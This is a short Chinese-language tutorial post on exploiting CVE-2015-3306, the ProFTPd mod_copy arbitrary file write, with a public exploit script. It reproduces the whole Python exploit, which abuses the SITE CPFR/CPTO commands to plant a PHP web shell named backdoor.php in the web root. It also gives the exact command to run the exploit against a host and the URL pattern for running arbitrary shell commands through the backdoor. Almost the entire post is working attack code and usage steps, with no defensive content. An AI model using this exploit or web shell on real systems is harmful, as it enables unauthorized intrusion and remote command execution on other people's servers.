前言
利用t0kx/exploit-CVE-2015-3306实现ProFTPd任意文件写入漏洞利用
漏洞利用前提
下载项目
1 2
| git clone https://github.com/t0kx/exploit-CVE-2015-3306.git cd exploit-CVE-2015-3306
|
源代码
exploit.py1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58
| import re import socket import requests import argparse
class Exploit: def __init__(self, host, port, path): self.__sock = None self.__host = host self.__port = port self.__path = path
def __connect(self): self.__sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.__sock.connect((self.__host, self.__port)) self.__sock.recv(1024)
def __exploit(self): payload = "<?php echo passthru($_GET['cmd']); ?>" self.__sock.send(b"site cpfr /proc/self/cmdline\n") self.__sock.recv(1024) self.__sock.send(("site cpto /tmp/." + payload + "\n").encode("utf-8")) self.__sock.recv(1024) self.__sock.send(("site cpfr /tmp/." + payload + "\n").encode("utf-8")) self.__sock.recv(1024) self.__sock.send(("site cpto "+ self.__path +"/backdoor.php\n").encode("utf-8"))
if "Copy successful" in str(self.__sock.recv(1024)): print("[+] Target exploited, acessing shell at http://" + self.__host + "/backdoor.php") print("[+] Running whoami: " + self.__trigger()) print("[+] Done") else: print("[!] Failed")
def __trigger(self): data = requests.get("http://" + self.__host + "/backdoor.php?cmd=whoami") match = re.search('cpto /tmp/.([^"]+)', data.text) return match.group(0)[11::].replace("\n", "")
def run(self): self.__connect() self.__exploit()
def main(args): print("[+] CVE-2015-3306 exploit by t0kx") print("[+] Exploiting " + args.host + ":" + args.port)
exploit = Exploit(args.host, int(args.port), args.path) exploit.run()
if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('--host', required=True) parser.add_argument('--port', required=True) parser.add_argument('--path', required=True) args = parser.parse_args()
main(args)
|
向Web站点根目录写入后门文件
1
| python3 exploit.py --host <ip> --port 21 --path "/var/www/html"
|
- 会在Web站点根目录生成
backdoor.php后门文件
<shell>:远程执行的Shell命令
request1
| GET http://127.0.0.1:80/backdoor.php?cmd=<shell>
|
完成
参考文献
哔哩哔哩——xiaodisec